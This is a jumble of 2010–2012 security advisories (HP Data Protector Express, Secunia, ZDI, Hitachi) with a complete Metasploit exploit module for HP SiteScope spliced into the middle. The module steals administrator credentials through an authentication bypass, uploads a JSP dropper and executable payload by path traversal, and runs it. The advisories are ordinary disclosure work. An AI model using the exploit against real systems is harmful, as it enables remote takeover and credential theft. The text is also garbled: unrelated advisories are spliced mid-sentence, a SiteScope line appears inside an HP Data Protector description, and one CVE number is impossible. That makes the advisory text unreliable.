Nth Dimension's comments. On the 27th August, the vulnerability was assigned CVE-1010-2952 and Lief distributed a proposed patch for feedback from other Traffic Server developers. Current As of the 30th August 2010, the state of the vulnerabilities is believed to be as follows. A patch has been supplied by the upstream which it is believed successfully mitigates the final symptoms of this vulnerability. New releases of both 2.0.x and 2.1.x have also been created which incorporate this patch. Thanks Nth Dimension would like to thank the Apache Software Foundation for the way they worked to resolve the issue. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQIcBAEBCAAGBQJMh4S+AAoJEPJhpTVyySo7kwMP/0wIPmO4nNyOhoF0VuUWqLvj Q7JzQ5xqLeU932Yp+AlDGvHgWYtKZP64Oi5vrkNavhhCRNhSuWMWrbiFb7NgmTdv EFualmdRXjhZY8O5cLoS6MuCYelosjuO2qDncgrV0xFZ59HXf7FRr/QSc/22Kaum Mp/DHItk3E1pTZD0BaVX34waCo01q6bPbfsJW0qZyPGUagfk8av6DobgQOwuiPXJ 4bNh4kgaZIY8bgCnOB/TmZM+pz7Tgh6yF2tbjc+0Qx/jdKi4Y+T9Jpv8oKx8+scM eHpb2iTFXUI7n5uie8nA8F1+Y0InEUr/GfppvEUzk/bHnfNuv5RAH7AuCpabf/kK +wnYMyhIN2vTmuxDfU/OB8uyzZIrCn6YmH/CFToutzP03I6SssdpsUM6qZd3p8Q/ GM+BYyNcBGk9IC1ikcalCjswtjekHjITJfpmosKyMGR2oFUR3Lh3dWGoDaG+7mSC w0TxA6FYtqfpJZngfnoBGwU3TGOpIf8S3KOBc7pYPsLBn9VFNAShJtHMi+Tcd/CD 2W9GJ0qJxy4EETJE5MG+PWrBOLQUVGheOxPtAmojHDXnBcfufAKpvCQkUmvdleTG ASqE0AiHB5r+4gXr7LIvvhT6hQrbDk3EEEseAGV2e7bT+jjHKA0IlbBcB1XW1kOW Y5sKeOJfAHl1iFu41rT4 =8naX -----END PGP SIGNATURE-----

Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 on Windows allows local users to gain privileges or cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3007. This vulnerability CVE-2010-3007 Is a different vulnerability.Authority may be obtained by local users. Authentication is not required to exploit this vulnerability.The specific flaw exists within the function PrvRecvRqu() defined in the module dpwinsup. While handling requests sent to TCP port 3817 the process can be forced to dereference a NULL pointer resulting in an unhandled exception that crashes the service. Attackers can leverage this issue to execute arbitrary code and gain elevated privileges or to cause denial-of-service conditions. The vulnerability could be exploited locally to create a Denial of Service (DoS) or to execute arbitrary code. References: CVE-2010-3008, ZDI-CAN 582 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Note: The supported versions of Microsoft Windows are listed below. Note: Users can identify the build number by clicking on 'Help' and then 'About'. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2010-3008 (AV:L/AC:L/Au:S/C:P/I:C/A:C) 6.4 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks AbdulAziz Hariri of Insight Technologies along with TippingPoint.s Zero Day Initiative for reporting this vulnerability to security-alert@hp.com HP Data Protector Express 'Hot Fix' (Build 56936) for version 3.5 SP2 is supported on the following Windows Operating Systems Version Microsoft Windows Unified Data Storage Server (incl. R2) Microsoft Windows Server 2003 Enterprise / Standard Editions (incl. R2) Microsoft Windows Storage Server 2003 (incl. R2) Microsoft Windows 2000 Server / Advanced Server SP4 Microsoft Windows Small Business Server 2000 SP4 Microsoft Windows 2000 Professional SP4 Microsoft Windows Small Business 2003 Server Premium / Standard (incl. R2) Microsoft Windows XP Professional / Home SP2 RESOLUTION HP has provided upgrades to resolve this vulnerability. PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) 8 September 2010 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkyIYMcACgkQ4B86/C0qfVmzkgCgzls4Iei6yshc9nuNP/VusGyN 5yQAoNWifun4az84bpWbKbyeVDvqu8rq =UEnX -----END PGP SIGNATURE-----

Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Data Protector. Authentication is not required to exploit this vulnerability.The specific flaw exists within the function DtbClsLogin defined in the module dpwindtb.dll on Windows and libdplindtb.so on Linux. This function takes user supplied input and copies it directly to a stack buffer. By providing a large enough string this buffer can be overrun and may result in arbitrary code execution dependent on the underlying operating system. One of those calls is getSiteScopeConfiguration() which will return the current configuration of the server including the administrator login and password information. ---------------------------------------------------------------------- Windows Applications Insecure Library Loading The Official, Verified Secunia List: http://secunia.com/advisories/windows_insecure_library_loading/ The list is continuously updated as we confirm the vulnerability reports so check back regularly too see if any of your apps are affected. ---------------------------------------------------------------------- TITLE: HP Data Protector Express Denial of Service and Privilege Escalation SECUNIA ADVISORY ID: SA41361 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/41361/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=41361 RELEASE DATE: 2010-09-10 DISCUSS ADVISORY: http://secunia.com/advisories/41361/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/41361/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=41361 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in HP Data Protector Express, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or potentially gain escalated privileges. The vulnerability is caused due to an unspecified error. No further information is currently available. PROVIDED AND/OR DISCOVERED BY: The vendor credits AbdulAziz Hariri of Insight Technologies via ZDI. ORIGINAL ADVISORY: HPSBMA02576 SSRT090231: http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . References: CVE-2010-3007, ZDI-CAN 581 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Note: The supported versions of Microsoft Windows, Linux, and Novell NetWare are listed below. Note: Users can identify the build number by clicking on 'Help' and then 'About'. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2010-3007 (AV:L/AC:L/Au:S/C:P/I:C/A:C) 6.4 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks AbdulAziz Hariri of Insight Technologies along with TippingPoint.s Zero Day Initiative for reporting this vulnerability to security-alert@hp.com HP Data Protector Express 'Hot Fix' (Build 56936) for version 3.5 SP2 is supported on the following: Windows Operating Systems Version Microsoft Windows Unified Data Storage Server (incl. R2) Microsoft Windows Server 2003 Enterprise / Standard Editions (incl. R2) Microsoft Windows Storage Server 2003 (incl. R2) Microsoft Windows 2000 Server / Advanced Server SP4 Microsoft Windows Small Business Server 2000 SP4 Microsoft Windows 2000 Professional SP4 Microsoft Windows Small Business 2003 Server Premium / Standard (incl. R2) Microsoft Windows XP Professional / Home SP2 Linux Operating Systems Version Red Hat Enterprise Linux (WS/ES/AS) 5 Red Hat Enterprise Linux (WS/ES/AS) 4 Red Hat Enterprise Linux (WS/ES/AS) 3 SuSE Linux Enterprise Server 10 SuSE Linux Enterprise Server 9 Novell Operating Systems Version NetWare 6.5 SP2 NetWare 6.0 SP3 HP Data Protector Express 'Hot Fix' (Build 56906) for version 4.0 SP1 is supported on the following: Windows Operating Systems Version Windows Server 2008 SP1 (32-bit and X64) Enterprise / Standard / Datacenter / Web Server Editions Windows Server 2003 R2 SP2 (32-bit and X64) Enterprise / Standard Editions Windows Small Business Server 2008 (32-bit and X64) Windows Small Business Server 2003 R2 (32-bit and X64) Windows Unified Data Storage Server 2003 R2 (32-bit and X64) Windows Storage Server 2003 R2 (32-bit and X64) Windows VISTA SP1 (32-bit and X64) Windows XP SP3 (32-bit) Linux Operating Systems Version Red Hat Enterprise Linux (WS/ES/AS) 5.0 update 1 (32-bit and X64) Red Hat Enterprise Linux (WS/ES/AS) 4.0 update 6 (32-bit and X64) SuSE Linux Enterprise Server 10 update 2 (32-bit and X64) SuSE Linux Enterprise Server 9 update 4 (32-bit and X64) Novell Operating Systems Version NetWare 6.5 SP5 RESOLUTION HP has provided upgrades to resolve this vulnerability. PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) 8 September 2010 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkyIYLcACgkQ4B86/C0qfVnz1QCgveZICKBeXxRlmAbL4cZvzgaq mbIAoPqa1Ba0NueuwFSHxxrzX95YSyf3 =sbSc -----END PGP SIGNATURE----- . -- Vendor Response: Hewlett-Packard has issued an update to correct this vulnerability. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'HP SiteScope Remote Code Execution', 'Description' => %q{ This module exploits a code execution flaw in HP SiteScope. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the getSiteScopeConfiguration operation, available through the APISiteScopeImpl AXIS service, to retrieve the administrator credentials and subsequently abuses the UploadManagerServlet to upload an arbitrary payload embedded in a JSP. The module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2. }, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '85120' ], [ 'OSVDB', '85121' ], [ 'BID', '55269' ], [ 'BID', '55273' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-174/' ] ], 'Privileged' => true, 'Platform' => 'win', 'Targets' => [ [ 'HP SiteScope 11.20 / Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' }, ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 29 2012')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']) ], self.class) end def on_new_session(client) if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm("../#{@var_hexfile}.txt") client.fs.file.rm("../#{@jsp_name}.jsp") else client.shell_command_token("del ..\\#{@var_hexfile}.txt") client.shell_command_token("del ..\\#{@jsp_name}.jsp") end end def exploit @peer = "#{rhost}:#{rport}" @uri = target_uri.path @uri << '/' if @uri[-1,1] != '/' # Retrieve administrator credentials print_status("#{@peer} - Retrieving HP SiteScope Configuration") conf = access_configuration if not conf or conf.empty? print_error("#{@peer} - Failed to retrieve the HP SiteScope Configuration") return end print_status("#{@peer} - Retrieving HP SiteScope administrator credentials") admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1] if not admin_data or admin_data.empty? print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials") return end admin_password = admin_data.split(/\x09_passwordt\x00/)[1] if not admin_password or admin_password.empty? print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials") return end password_length = admin_password.unpack("C").first if password_length > 0 password = admin_password[1, password_length] else password = "" end admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2] if not admin_user_type or admin_user_type.empty? print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials") return end if admin_user_type == "_logint" if not admin_user or admin_user.empty? print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials") return end user_length = admin_user.unpack("C").first else user_length = 0 end if user_length > 0 user = admin_user[1, user_length] else user = "" end # Generate an initial JSESSIONID print_status("#{@peer} - Retrieving an initial JSESSIONID") res = send_request_cgi( 'uri' => "#{@uri}servlet/Main", 'method' => 'POST', ) if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 else print_error("#{@peer} - Retrieve of initial JSESSIONID failed") return end # Authenticate login_data = "j_username=#{user}&j_password=#{password}" print_status("#{@peer} - Authenticating on HP SiteScope Configuration") res = send_request_cgi( { 'uri' => "#{@uri}j_security_check", 'method' => 'POST', 'data' => login_data, 'ctype' => "application/x-www-form-urlencoded", 'headers' => { 'Cookie' => "JSESSIONID=#{session_id}", } }) if res and res.code == 302 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 redirect = URI(res.headers['Location']).path else print_error("#{@peer} - Authentication on SiteScope failed") return end # Follow redirection to complete authentication process print_status("#{@peer} - Following redirection to finish authentication") res = send_request_cgi( { 'uri' => redirect, 'method' => 'GET', 'headers' => { 'Cookie' => "JSESSIONID=#{session_id}", } }) if not res or res.code != 200 print_error("#{@peer} - Authentication on SiteScope failed") return end # Upload the JSP and the raw payload @jsp_name = rand_text_alphanumeric(8+rand(8)) # begin <payload>.jsp var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) var_data = Rex::Text.rand_text_alpha(rand(8)+8) var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) var_counter = Rex::Text.rand_text_alpha(rand(8)+8) var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) var_comb = Rex::Text.rand_text_alpha(rand(8)+8) var_exe = Rex::Text.rand_text_alpha(rand(8)+8) @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) var_proc = Rex::Text.rand_text_alpha(rand(8)+8) var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) jspraw = "<%@ page import=\"java.io.*\" %>\n" jspraw << "<%\n" jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" jspraw << "String #{var_data} = \"\";\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" jspraw << "}\n" jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" jspraw << "#{var_inputstream}.close();\n" jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" jspraw << "{\n" jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" jspraw << "#{var_comb} <<= 4;\n" jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" jspraw << "}\n" jspraw << "#{var_outputstream}.write(#{var_bytes});\n" jspraw << "#{var_outputstream}.close();\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" jspraw << "String[] #{var_fperm} = new String[3];\n" jspraw << "#{var_fperm}[0] = \"chmod\";\n" jspraw << "#{var_fperm}[1] = \"+x\";\n" jspraw << "#{var_fperm}[2] = #{var_exepath};\n" jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" jspraw << "if (#{var_proc}.waitFor() == 0) {\n" jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "}\n" # Linux and other UNICES allow removing files while they are in use... jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" jspraw << "} else {\n" # Windows does not .. jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "}\n" jspraw << "%>\n" # Specify the payload in hex as an extra file.. payload_hex = payload.encoded_exe.unpack('H*')[0] post_data = Rex::MIME::Message.new post_data.add_part(payload_hex, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") print_status("#{@peer} - Uploading the payload") res = send_request_cgi( { 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=..\\..\\..\\..\\..\\..\\#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true", 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'Cookie' => "JSESSIONID=#{session_id}", } }) if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 print_good("#{@peer} - Payload successfully uploaded to #{path}") else print_error("#{@peer} - Error uploading the Payload") return end post_data = Rex::MIME::Message.new post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"") print_status("#{@peer} - Uploading the JSP") res = send_request_cgi( { 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=..\\..\\..\\..\\..\\..\\#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'Cookie' => "JSESSIONID=#{session_id}", } }) if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/ path = $1 print_good("#{@peer} - JSP successfully uploaded to #{path}") else print_error("#{@peer} - Error uploading the JSP") return end print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") send_request_cgi( { 'uri' => "#{@uri}#{@jsp_name}.jsp", 'method' => 'GET', 'headers' => { 'Cookie' => "JSESSIONID=#{session_id}", } }) end def access_configuration data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" data << "xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n" data << "xmlns:xsd='http://www.w3.org/2001/XMLSchema'" + "\r\n" data << "xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'" + "\r\n" data << ">" + "\r\n" data << "<wsns0:Body" + "\r\n" data << "wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'" + "\r\n" data << ">" + "\r\n" data << "<impl:getSiteScopeConfiguration" + "\r\n" data << "xmlns:impl='http://Api.freshtech.COM'" + "\r\n" data << "></impl:getSiteScopeConfiguration>" + "\r\n" data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" res = send_request_cgi({ 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, 'headers' => { 'SOAPAction' => '""', }}) if res and res.code == 200 if res.headers['Content-Type'] =~ /boundary="(.*)"/ boundary = $1 end if not boundary or boundary.empty? return nil end if res.body =~ /getSiteScopeConfigurationReturn href="cid:([A-F0-9]*)"/ cid = $1 end if not cid or cid.empty? return nil end if res.body =~ /#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m loot = Rex::Text.ungzip($1) end if not loot or loot.empty? return nil end return loot end return nil end end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-173 : (0Day) HP SiteScope SOAP Call getSiteScopeConfiguration Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-173 August 29, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: Hewlett-Packard - -- Affected Products: Hewlett-Packard SiteScope - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12484. Authentication is not required to exploit this vulnerability. - -- Vendor Response: - -- Mitigation: Given the stated purpose of SiteScope, and the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the HP SiteScope service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in http://technet.microsoft.com/en-us/library/cc725770%28WS.10%29.aspx and numerous other Microsoft Knowledge Base articles. - -- Disclosure Timeline: 2011-12-22 - Vulnerability reported to vendor 2012-08-29 - 0Day advisory released in accordance with the ZDI 180 day deadline policy - -- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product

Hitachi JP1/NETM/Remote Control Agent is prone to a security-bypass vulnerability. Remote attackers can exploit this issue to bypass security restrictions and gain unauthorized access. Other attacks may also be possible. ---------------------------------------------------------------------- Windows Applications Insecure Library Loading The Official, Verified Secunia List: http://secunia.com/advisories/windows_insecure_library_loading/ The list is continuously updated as we confirm the vulnerability reports so check back regularly too see if any of your apps are affected. ---------------------------------------------------------------------- TITLE: Hitachi JP1/Remote Control Agent Security Bypass Vulnerability SECUNIA ADVISORY ID: SA41524 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/41524/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=41524 RELEASE DATE: 2010-09-22 DISCUSS ADVISORY: http://secunia.com/advisories/41524/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/41524/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=41524 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ 